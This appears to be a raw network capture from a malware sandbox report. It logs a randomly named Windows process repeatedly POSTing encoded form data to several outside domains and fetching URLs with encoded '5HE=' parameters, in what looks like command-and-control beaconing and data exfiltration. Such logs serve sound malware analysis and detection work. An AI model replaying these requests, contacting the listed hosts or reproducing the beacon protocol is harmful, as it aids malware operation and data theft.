                                              Jul 21, 2024 13:32:45.309068918 CEST | 706 | OUT | POST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=ZM9zL8hEQCsVv2YGtjQ47bvW64TzzyrvaMYDzfjQEPYzsHvTIfRu8R16iKyfbTIQod3ggD7XEcSL0F0G+XAPaG33hL8ALP4h6Fc2+Qgqp3M62/EMEMS9KZM3YfxWtBscgNzHpZPI82xMQCwkr4BhU0oHaFAxqGmsZIeayHP/ttEKEeRsHZZHcHCWOE0pbgixNejH/Nebe0BGCoI5UQ==
                                              Jul 21, 2024 13:32:45.917604923 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:45 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              22          192.168.2.7  49727        203.161.41.207  80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:32:47.846599102 CEST  726                OUT        POST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=ZM9zL8hEQCsVvSkGsEE4sLvR1YTzpCrraMEDzeXmH5gztmfTH+Ru1B16pqyefTIOod6VgBvXEcWL0AIG9mAOV231sr9GU/4h6Fc2+QkMp3E62v0MHtS+LZM4bfxW7xsYgNygpcru8w1MQHUkqpBgf0oJUlBDslDUZZma7mDJg6dqMIMOd7VrCW6tKGQfMG/EPfnfyvq6BDksP6p9CgmGV4FtF7bP1R1KR9qSiX0=
                                              Jul 21, 2024 13:32:48.445993900 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:48 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              23          192.168.2.7  49728        203.161.41.207  80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:32:50.375916958 CEST  1739               OUT        POST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:51.011807919 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:50 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              24          192.168.2.7  49729        203.161.41.207  80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:32:52.907337904 CEST  445                OUT        GET /or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:53.501008034 CEST  548                IN         HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:53 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              25          192.168.2.7  49730        84.32.84.32     80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:32:58.613533020 CEST  706                OUT        POST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=WlSqfsjU+fhjgInKZhdel+XZq2qiXwg7JgiH+nH1+nR1yQ9G14dVV4x2JqfEreRJwW41iLdHuLqQuVQsqyyK91B65a2/4xfI96XXyny1Zh3P87fHfZ62JloLIE4B3vSNx0Tl2t/CTKx+/5eNSI2DSJTbUiSFrMMGJWKsJxSlMGU1eAC5KnDJq+CkSbK0df3COHt6gDU4DNdYww2j+Q==


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              26          192.168.2.7  49731        84.32.84.32     80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:33:01.157653093 CEST  726                OUT        POST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=WlSqfsjU+fhjjr/KKwdet+Xav2qieQg/JguH+inl9V11yxNG7dpVcox2CKeMl+R4wWlKiLhHuL+QuXIsqCOJnFAciK292RfI96XXynnuZlbP8rvHe461HFoMPE4B9PSBx0Sy2peZTP1+/5uNc52AZJTCQiT5l8xcFj6CJyW+Eg0Mb2fbQFPl0v6fWZuCK5q3MGpithgZc64y9iXnovLc0vKoyUqFIu6Obn1h2t8=


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              27          192.168.2.7  49732        84.32.84.32     80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:33:03.689584970 CEST  1739               OUT        POST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              28          192.168.2.7  49733        84.32.84.32     80                6392  C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp                             Bytes transferred  Direction  Data
                                              Jul 21, 2024 13:33:06.219988108 CEST  445                OUT        GET /rjez/?5HE=bn6Kcb/G7NRz+77UcQJW4qLiu1GocAgaZTa4wjHl00pV2XIs1a9SZ4czJq6TxPof2hMjxPpppayxuFpboBicziwpjYC97Q/w/47U8Wa1V0+MlpjcY/2kLWYOIWUc1P6D3HPWzK7wcq5j&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:06.685714960 CEST  1236               IN         HTTP/1.1 200 OK
                                              Server: hcdn
                                              Date: Sun, 21 Jul 2024 11:33:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 10072
                                              Connection: close
                                              Vary: Accept-Encoding
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 67032ff9c996a836bca0c57b151bca89-bos-edge3
                                              Expires: Sun, 21 Jul 2024 11:33:05 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.2.7 | 49734 | 13.248.169.48 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:11.743964911 CEST | 709 | OUT | POST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=wwowu0jq1GCKQe0QHOkN6m/xNTtrPj9vPUZ02uVDXe6Wn21+fH/0FuaAjyp0cn+39sEPPtjLe4ZmfQKWqgQdEdZOJxVQNiJXrCsEsYOuN0UrOEntOI4VugB++anLVXKfzDA0ObO+W3GGTD/c8oWdSSUUtOeWXdCoy14nDx81N/tetDPZEZrvzQIMVLHrA1elPJ22GBWKfh3kFnUA8A==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.2.7 | 49735 | 13.248.169.48 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:14.303020000 CEST | 729 | OUT | POST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=wwowu0jq1GCKR/EQUdMN8G+DTjtrBD9rPUd02vQcXteWnXF+YG/0EuaArSpLYn+K9sYxPtvLe4NmfVmWqz4cGNZMGRVSSyJXrCsEsYLmN0crOUXtJdMWyQB/5anLRXKbzDBnOemUW1+GTCPc85WebSUSjufVTffisXMdGCQvBPBJhVS7e7nDtBw3RJjdXTDQNIyuLjirAWSOI11Eq6B0dgqXPFnFZOjoLv6/MHo=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.2.7 | 49736 | 13.248.169.48 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:16.852766991 CEST | 1742 | OUT | POST /m8jb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Origin: http://www.ecoaxion.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.ecoaxion.com/m8jb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32 | 192.168.2.7 | 49737 | 13.248.169.48 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:19.395808935 CEST | 446 | OUT | GET /m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ecoaxion.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:19.875340939 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:33:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33 | 192.168.2.7 | 49738 | 148.135.97.125 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:25.259702921 CEST | 703 | OUT | POST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=lGzA4QYto5MwBOoD3hiJ0SWrRulPFojyFgXHrdPk84eEvkvQHKSBDsdU9QRR/7xGFf/vqZeFHDY91XYGO5jzQ1cIu2GkyNmvzoS1d2qSQWPViVlBX8sPbWgxiqTvEAoVT7m0BARKRpKuyER1i0weo2BZZ0iiFlXUqyAB3KfRJo5TGrZCH6cndr7McRDzZmFqH1fVGtVycX0TKdxrOw==
                                              Jul 21, 2024 13:33:25.839411974 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              34 | 192.168.2.7 | 49739 | 148.135.97.125 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:27.797679901 CEST | 723 | OUT | POST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=lGzA4QYto5MwAu4DkAiJ2yWqfOlPfYj2FgbHrfip8uGEoFzQGPmBEsdU2wRQ77xPFf6aqYiFHAk91VQGPKLwWlcKmWGivdmvzoS1d2/3QWXVhlVBWYAOHGg+1aTvTQoRT7mKBFJsRsWuyFN1jlwdymBfEkjhAVO/sicjvsftAZlnDdEgdYQLD6D3YTnFOAYfF0bNLPhTDgR5HPQvYPSfQlo8EcyQdmCX1D3+13A=
                                              Jul 21, 2024 13:33:28.376972914 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              35 | 192.168.2.7 | 49740 | 148.135.97.125 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:30.329560041 CEST | 1736 | OUT | POST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]
                                              Jul 21, 2024 13:33:30.907619953 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              36 | 192.168.2.7 | 49741 | 148.135.97.125 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:32.859684944 CEST | 444 | OUT | GET /vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:33.452344894 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              37 | 192.168.2.7 | 49742 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:38.620356083 CEST | 712 | OUT | POST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=fEOgv+cN2RnTtA3xKrDgV61pwtxhBAJELBL9rDZ1zeZtgSynIKNGtqmmpRP1WFru9N/HPMNTIfWYYPKGMiTYT0BKkcnGpzEL2ZtYzE+ASH4fQqs+j3WYhTVrq1wkOfE9juhnPMa0NN5xcKdrjoDyTCoEti5eZ9cgRLfg3obFcJX/Raa6x4Lny0hIZzdsaQV1rtEOQZus5QteAuifzg==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              38 | 192.168.2.7 | 49743 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:41.155921936 CEST | 732 | OUT | POST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
